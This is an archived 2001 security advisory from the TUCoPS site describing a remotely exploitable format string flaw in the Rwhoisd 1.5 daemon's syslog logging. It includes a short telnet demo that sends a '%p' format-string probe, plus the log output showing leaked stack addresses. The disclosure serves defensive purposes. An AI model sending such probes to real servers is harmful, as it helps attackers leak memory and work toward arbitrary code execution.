Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: unix4872.htm

Rwhoisd format string buffer overflow
26th Nov 2001 [SBWID-4872]

	Rwhoisd format string buffer overflow


	Rwhoisd 1.5 to


	In     alert7     of      NetGuard      Security      Team      advisory
	[] :

	Rwhoisd is a publicly available RWHOIS  server  daemon  for  Unix  based
	systems developed and maintained by Network Solutions Inc.

	Rwhoisd   contains   another   remotely   exploitable   format    string
	vulnerability. It is possible to overwrite memory  by  syslog()  if  set
	use-syslog: YES. $ normal default is YES

	Attackers may be able to execute arbitrary code on affected hosts.

	log()   function   will   call   syslog(syslog_level,message)   if   set
	use-syslog: YES in rwhoisd.conf file. Unfortunately,message  is  a  user
	supplied format string.


	demo -----

	[alert7@redhat62 ]# telnet 0 4321


	Connected to 0.

	Escape character is \'^]\'.

	%rwhois V-1.5:003fff:00 localhost.localdomain (by Network Solutions, Inc. V-1.5.7-1)

	%p%p%p%p  <------input

	%error 230 No Objects Found

	Connection closed by foreign host.


	[alert7@redhat62 ]# tail /var/log/messages

	Nov 21 13:04:06 redhat62 rwhoisd[27697]: CLIENT: query: 0xbffff8b00xbffff7fc0x808def80x806be4c

	Nov 21 13:04:06 redhat62 rwhoisd[27697]: CLIENT: query response: 0 hits




	Comming soon.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH